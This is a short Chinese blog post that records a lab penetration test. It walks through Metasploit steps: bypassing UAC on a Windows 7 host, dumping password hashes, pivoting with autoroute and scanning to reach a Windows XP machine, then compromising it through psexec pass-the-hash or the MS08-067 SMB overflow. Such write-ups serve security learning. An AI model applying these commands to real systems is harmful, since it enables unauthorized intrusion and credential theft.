内网bypassuac和smb溢出

Posted on 2018-12-16 22:32 卿先生 阅读() 评论() 编辑 收藏

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

 

环境大致如下 拥有shell权限的win7(uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp

 

先对有权限的win7进行hashdump

 

 

显示失败 getsystem一下

 

 还是失败 msf的模块绕过uac

use exploit/windows/local/bypassuac

 

set session 1(session1 为我们的win7权限)

 

此时再进入meterpreter  hashdumpgetsystem

 

可以看到绕过了uac  获得了权限

 

导出了hash 接下来对和win7同网段的xp进行扫描探测

 

得到本地子网网段

run get_local_subnets

 

处于192.168.100.0 子网掩码为255.255.255.0这个网段

run autoroute  -s 网段  添加路由  -p 查看已经添加的路由

 

添加完成后  开始扫描

扫描存活ip

run post/windows/gather/arp_scanner RHOST=网段

 

发现内网以下存在这些主机 其中192.168.100.5 是目标xp

 

 确定了目标 接下来扫描端口

 

扫描端口

run axiliary/scanner/portscan/tcp

 

 

 

探测完信息后

 

可以通过之前抓的hash值 进行hash传递攻击

 

使用msf 下的exploit/windows/smb/psexec

 

 

 

也可以通过对应服务溢出漏洞 渗透拿到目标xp的权限

 

 

 

 

 开放了smb 使用了ms08_067 溢出成功

 

版权声明:本文为-qing-原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/-qing-/p/10128930.html